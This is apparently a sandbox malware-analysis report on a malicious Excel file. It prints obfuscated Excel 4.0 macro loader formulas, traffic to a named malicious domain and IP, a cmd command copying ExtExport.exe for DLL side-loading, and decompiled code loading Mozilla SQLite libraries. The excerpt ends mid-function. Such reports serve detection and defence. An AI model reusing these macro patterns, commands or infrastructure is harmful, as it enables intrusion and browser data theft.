Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . i . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.316312415339
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . W . . @ . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	81910
Entropy:	7.97723236264
Base64 Encoded:	True
Data ASCII:	. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . j . . . _ . W > N . B . . [ . . . . . . D . G . . . . 9 s < D l . o . b . 3 . ^ K W . ~ . U . . . . . . . . . . . h . . . . . \\ . p . i . . v . / . . . . B . 7 r . n . S . $ . 4 f . 7 . U . . e . Y k . . . L Q . . o N . . . . $ a . 7 Q . . . u . s . X U . ^ . . . . . . K . C d . . . l . ? . & . C . . . . . . . . v . . . . . 4 ; / . . . . 6 4 = . . . . . . B . . . . I a . . . . D . . . . = . . . . # . c . . . . h . . . . . s R . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 02 6a df 82 8f 5f f7 57 3e 4e 18 42 a0 92 5b 1d e8 95 bd ea b2 44 89 47 13 ad c8 06 39 73 3c 44 6c 0c 6f cd 62 dc 33 7f 5e 4b 57 2e 7e e6 55 cf e1 00 02 00 b0 04 c1 00 02 00 68 a6 e2 00 00 00 5c 00 70 00 69 b6 c9 76 af 2f 14 b1 ed d6 42 f4 37 72 10 6e cc 53 fc 24 ef 34 66 18 37 82 55 80 f5 65

Macro 4.0 Code

,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,x,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $N$84&$X$102&$K$324&$C$460&$M$83&$K$324&$N$447&$I$336&$X$102&$K$324&$X$82&$M$83&$U$271&$X$102&$V$246&$X$462,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $W$367,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($K$351),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $H$409&$H$409&$N$84&$N$84&$N$84&$N$84&$H$409,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $Y$71,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($I$385),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\,,,,,,,,,,,,,,,,,,,,,,,Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,,,,,,,,,t,,,,,,,,,,,,,,,,,,,,,,,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RETURN(FORMULA.FILL(mxUXwaSU,id9nB5my))",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,q,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,I,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,6,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= $F$204&$H$481&$K$324&$N$11&$N$11&$E$78&$I$228,,,,,,,,,,,,,,,,,,,,,,id9nB5my= $D$167,,,,,,,,,,,,,,,,,,,,,,=$F$105(),,,,,,,,,,,,,,,,,,,,,,=RUN($R$247),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 23:39:07.758977890 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.814593077 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.814827919 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.815645933 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.870667934 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.871705055 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.871733904 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.871757030 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.871773958 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.871809959 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.871840000 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.871850014 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.875941038 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.876013041 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.889168978 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.948826075 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:07.949002028 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:07.949609995 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:39:08.047010899 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:08.129976034 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:39:08.130068064 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:40:23.176129103 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:40:23.176176071 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:40:23.176424026 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:40:54.416600943 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:40:54.416651011 CEST	49736	443	192.168.2.4	198.244.146.96
Jun 10, 2021 23:40:54.471982002 CEST	443	49736	198.244.146.96	192.168.2.4
Jun 10, 2021 23:40:54.472306013 CEST	49736	443	192.168.2.4	198.244.146.96

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 23:38:52.967205048 CEST	54531	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:38:53.029515982 CEST	53	54531	8.8.8.8	192.168.2.4
Jun 10, 2021 23:38:53.091182947 CEST	49714	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:38:53.141277075 CEST	53	49714	8.8.8.8	192.168.2.4
Jun 10, 2021 23:38:53.899147034 CEST	58028	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:38:53.949414968 CEST	53	58028	8.8.8.8	192.168.2.4
Jun 10, 2021 23:38:55.018290997 CEST	53097	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:38:55.081427097 CEST	53	53097	8.8.8.8	192.168.2.4
Jun 10, 2021 23:38:55.103068113 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:38:55.157798052 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 10, 2021 23:38:55.968286991 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:38:56.028430939 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 10, 2021 23:38:57.970202923 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:38:58.023649931 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:03.437601089 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:03.490520000 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:04.416615009 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:04.516530991 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:04.961870909 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:05.033673048 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:05.919765949 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:05.969824076 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:06.014739037 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:06.088699102 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:07.061800003 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:07.120498896 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:07.696746111 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:07.756989002 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:08.098918915 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:08.149171114 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:08.868616104 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:08.932203054 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:09.108942032 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:09.161076069 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:09.714025974 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:09.767750025 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:10.686068058 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:10.736035109 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:11.658345938 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:11.717427969 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:12.518906116 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:12.569057941 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:13.204545021 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:13.263603926 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:13.651770115 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:13.710468054 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:16.330972910 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:16.381169081 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:17.101145983 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:17.154200077 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:17.867068052 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:17.917368889 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:18.687213898 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:18.740266085 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:19.499142885 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:19.560852051 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:22.964379072 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:23.028353930 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:37.752346039 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:37.890376091 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:38.459012032 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:38.692450047 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:38.839421988 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:38.910661936 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:39.287220001 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:39.348902941 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:39.869817972 CEST	56448	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:39.931515932 CEST	53	56448	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:40.743299961 CEST	59172	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:40.804954052 CEST	53	59172	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:41.466109991 CEST	62420	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:41.528162956 CEST	53	62420	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:42.488322020 CEST	60579	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:42.548993111 CEST	53	60579	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:43.587331057 CEST	50183	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:43.649781942 CEST	53	50183	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:44.450370073 CEST	61531	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:44.510262012 CEST	53	61531	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:45.030211926 CEST	49228	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:45.091671944 CEST	53	49228	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:48.179131031 CEST	59794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:48.229815960 CEST	53	59794	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:58.221915960 CEST	55916	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:58.278551102 CEST	52752	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:39:58.300194025 CEST	53	55916	8.8.8.8	192.168.2.4
Jun 10, 2021 23:39:58.347940922 CEST	53	52752	8.8.8.8	192.168.2.4
Jun 10, 2021 23:40:00.832252026 CEST	60542	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:40:00.892834902 CEST	53	60542	8.8.8.8	192.168.2.4
Jun 10, 2021 23:40:34.100034952 CEST	60689	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:40:34.169770002 CEST	53	60689	8.8.8.8	192.168.2.4
Jun 10, 2021 23:40:35.246970892 CEST	64206	53	192.168.2.4	8.8.8.8
Jun 10, 2021 23:40:35.305468082 CEST	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 23:39:07.696746111 CEST	192.168.2.4	8.8.8.8	0x412	Standard query (0)	webhub365.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 23:39:07.756989002 CEST	8.8.8.8	192.168.2.4	0x412	No error (0)	webhub365.com		198.244.146.96	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 10, 2021 23:39:07.875941038 CEST	198.244.146.96	443	192.168.2.4	49736	CN=webhub365.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Jun 08 19:53:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Mon Sep 06 19:53:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6968 Parent PID: 800

General

Start time:	23:39:03
Start date:	10/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xfd0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7156 Parent PID: 6968

General

Start time:	23:39:08
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6172 Parent PID: 7156

General

Start time:	23:39:08
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: nnAzot.exe PID: 4600 Parent PID: 6968

General

Start time:	23:39:10
Start date:	10/06/2021
Path:	C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Wow64 process (32bit):	true
Commandline:	'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Imagebase:	0x1150000
File size:	44544 bytes
MD5 hash:	CE639EB63B7C1C1EC94651B65CCEC383
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: nnAzot.exe PID: 4600 Parent PID: 6968 nnAzot.exeCOMMON

Executed Functions

Function 01153367, Relevance: 71.9, APIs: 21, Strings: 20, Instructions: 160
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E01153367(struct HINSTANCE__** __ecx, void* __edx, char _a4, WCHAR* _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				WCHAR* _v1052;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				WCHAR* _t35;
				struct HINSTANCE__* _t41;
				struct HINSTANCE__* _t43;
				struct HINSTANCE__* _t66;
				signed int _t67;
				void* _t72;
				struct HINSTANCE__** _t73;
				void* _t75;
				signed int _t80;

				_t72 = __edx;
				_t33 =  *0x115a064; // 0xc03c63c6
				_v8 = _t33 ^ _t80;
				_t35 = _a8;
				_t73 = __ecx;
				_v1052 = _t35;
				_t67 = 0x80004005;
				if(_a4 == 0) {
					_push(L"mozcrt19.dll");
					E01153280( &_v1048, 0x104, L"%s\\%s", _t35);
					_push(L"mozsqlite3.dll");
					E01153280( &_v528, 0x104, L"%s\\%s", _v1052);
					_t75 = 0;
					_t41 = LoadLibraryExW( &_v1048, 0, 0); // executed
					_t73[1] = _t41;
					_t43 = LoadLibraryExW( &_v528, 0, 0x1100); // executed
					 *_t73 = _t43;
					if(_t43 != 0) {
						L5:
						if( *_t73 == 0) {
							_t67 = GetLastError();
							if(_t67 > 0) {
								_t67 = _t67 & 0x0000ffff | 0x80070000;
							}
						} else {
							_t73[0x49] = GetProcAddress( *_t73, "sqlite3_open");
							_t73[0x8a] = GetProcAddress( *_t73, "sqlite3_open_v2");
							_t73[0x4a] = GetProcAddress( *_t73, "sqlite3_open16");
							_t73[0x3a] = GetProcAddress( *_t73, "sqlite3_exec");
							_t73[0x3d] = GetProcAddress( *_t73, "sqlite3_free");
							_t73[0x13] = GetProcAddress( *_t73, "sqlite3_close");
							_t73[0x77] = GetProcAddress( *_t73, "sqlite3_prepare_v2");
							_t73[0x78] = GetProcAddress( *_t73, "sqlite3_prepare16_v2");
							_t73[0x19] = GetProcAddress( *_t73, "sqlite3_column_count");
							_t73[0x1f] = GetProcAddress( *_t73, "sqlite3_column_int");
							_t73[0x20] = GetProcAddress( *_t73, "sqlite3_column_int64");
							_t73[0x27] = GetProcAddress( *_t73, "sqlite3_column_text");
							_t73[0x28] = GetProcAddress( *_t73, "sqlite3_column_text16");
							_t73[0x61] = GetProcAddress( *_t73, "sqlite3_step");
							_t73[0x50] = GetProcAddress( *_t73, "sqlite3_reset");
							_t73[0x3c] = GetProcAddress( *_t73, "sqlite3_finalize");
							_t73[0x13] = GetProcAddress( *_t73, "sqlite3_close");
						}
						if( *_t73 != _t75 && _t73[0x4a] != _t75) {
							_t75 = 1;
						}
